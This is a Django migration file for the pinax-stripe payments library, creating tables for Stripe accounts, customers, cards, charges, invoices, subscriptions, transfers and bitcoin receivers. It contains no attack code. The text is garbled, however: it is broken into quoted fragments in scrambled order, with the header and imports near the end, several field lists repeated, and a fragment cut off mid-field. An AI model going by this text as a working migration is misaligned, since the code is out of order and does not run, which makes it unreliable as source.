"max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')),", "models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True,", "models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days',", "models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True,", "('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand',", "null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)),", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', 
models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices',", "field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether( name='plan', unique_together=set([('stripe_id', 'stripe_account')]), ),", "models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)),", "('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)),", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id',", "('account_balance', models.DecimalField(blank=True, decimal_places=2, 
max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)),", "related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[", "Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel(", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2,", "default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None,", "migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True,", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "}, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( 
name='Customer', fields=[ ('id',", "('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None,", "('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True,", "serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)),", "models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description',", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)),", "name='Account', fields=[ ('id', models.CharField(editable=False, 
max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name',", "null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)),", "), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)),", "('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True,", "('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', 
models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True,", "models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed',", "related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False,", "('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True,", "('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer',", "('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True,", "models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False,", "('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), 
('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True,", "name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ),", "models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)),", "('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code',", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check',", "models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)),", "max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', 
models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email',", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)),", "models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True,", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name',", "}, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)),", "False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, 
on_delete=django.db.models.deletion.CASCADE, related_name='charges',", "models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)),", "('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer',", "), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)),", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True,", "('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "('authorized', models.BooleanField(default=True)), ('user', 
models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, },", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ),", "jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)),", "primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True,", "('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, },", "null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'),", "import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL),", "null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract':", "migrations.CreateModel( name='Account', fields=[ ('id', 
models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import", "('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True,", "null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True,", "name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()),", "name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)),", "models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), 
('transfer_group', models.TextField(blank=True,", "from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models", "'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data',", "models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)),", "null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment',", "models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request',", "null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)),", "1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals from decimal import Decimal from", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False,", "<reponame>bonidjukic/pinax-stripe # -*- coding: utf-8 -*- # Generated by Django 1.11.8 on 2018-08-06", "related_query_name='user_account', 
to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField(", "null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract':", "dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False,", "null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)),", "('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed',", "migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount',", "null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)),", "models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', 
models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ),", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user',", "('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)),", "models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True,", "jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract':", "('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()),", "models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', 
models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)),", "name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2,", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval',", "models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True,", "name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'),", "models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')),", "('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized',", 
"models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)),", "jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True,", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2,", "('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel(", "null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)),", "max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity',", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', 
models.PositiveIntegerField(blank=True, null=True)),", "null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel(", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount',", "null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed',", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)),", "('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True,", "null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'),", "null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), 
('api_version', models.CharField(blank=True, max_length=100)),", "('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={", "max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2,", "on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin,", "models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32,", "related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ),", "}, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "models.TextField(blank=True, null=True)), ('legal_entity_verification_status', 
